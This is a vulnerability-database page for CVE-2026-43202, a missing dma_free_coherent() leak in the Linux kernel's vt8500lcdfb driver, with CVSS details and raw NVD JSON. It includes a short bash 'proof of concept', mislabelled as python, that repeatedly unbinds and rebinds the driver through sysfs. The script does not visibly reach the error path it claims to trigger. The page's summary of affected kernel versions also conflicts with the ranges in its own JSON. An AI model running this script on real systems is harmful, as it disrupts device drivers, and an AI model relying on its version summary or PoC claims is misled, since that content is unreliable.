Security Vulnerability Report
中文
CVE-2026-43202 CVSS 5.5 MEDIUM

CVE-2026-43202

Published: 2026-05-06 12:16:39
Last Modified: 2026-05-11 20:10:35
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved: fbdev: vt8500lcdfb: fix missing dma_free_coherent() fbi->fb.screen_buffer is allocated with dma_alloc_coherent() but is not freed if the error path is reached.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux Kernel < 6.6 (specific commits fix this)
Linux Kernel < 6.1
Linux Kernel < 5.15
Linux Kernel < 5.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/bin/bash # Proof of Concept (PoC) for CVE-2026-43202 # This script attempts to trigger the memory leak by unbinding and rebinding the driver. # Requires root privileges or access to sysfs. DRIVER_PATH="/sys/bus/platform/drivers/vt8500-lcd" DEVICE_ID="vt8500-lcd.0" # Example device ID, may vary echo "Attempting to trigger memory leak in vt8500lcdfb..." if [ -d "$DRIVER_PATH" ]; then # Loop to trigger the error path multiple times for i in {1..100}; do # Unbind the device (trivers probe/release) if [ -e "$DRIVER_PATH/unbind" ]; then echo "$DEVICE_ID" > "$DRIVER_PATH/unbind" 2>/dev/null fi # Bind the device (triggers probe/alloc) if [ -e "$DRIVER_PATH/bind" ]; then echo "$DEVICE_ID" > "$DRIVER_PATH/bind" 2>/dev/null fi echo "Iteration $i completed." done echo "Check kernel logs (dmesg) for memory allocation issues." else echo "Driver path not found. Target system may not be vulnerable or driver not loaded." fi

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-43202", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-06T12:16:39.347", "lastModified": "2026-05-11T20:10:35.477", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nfbdev: vt8500lcdfb: fix missing dma_free_coherent()\n\nfbi->fb.screen_buffer is allocated with dma_alloc_coherent() but is not\nfreed if the error path is reached."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.7", "versionEndExcluding": "5.10.252", "matchCriteriaId": "965F0918-954F-45C2-B7A3-70621FA7C51E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.202", "matchCriteriaId": "4002FC2B-1456-4666-B240-0EBF590C4671"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.165", "matchCriteriaId": "797C7F46-D0BE-4FB8-A502-C5EF8E6B6654"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.6.128", "matchCriteriaId": "851E9353-6C09-4CC9-877E-E09DB164A3C2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.75", "matchCriteriaId": "BCE16369-98ED-41CF-8995-DFDC10B288D2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.16", "matchCriteriaId": "B4B8CDA9-BADF-4CF5-8B3B-702DE8EEA40B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.6", "matchCriteriaId": "373EEEDA-FAA1-4FB4-B6ED-DB4DD99DBE67"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/2cd2f988a8bd2da227f5c3cfa0cbf3a9a287ddc3", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/40c1ff25025150ff6d7ec7ad441fcfd6d070ee76", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/778f31be5b8c10024db23fdd8a05f68a02311008", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/88b3b9924337336a31cefbe99a22ed09401be74a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/9a9bc60ed372aaae9784ff8ad8e5f496ff15fd31", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/9c3873cccb3fab54cde0605ae7093d332c99073e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/e8c5d5f6cd66e032f9aefdcc21b0c34761aef78a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/f47d5b9e8aa6178a0aaf225119ad1ec7d3f49876", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.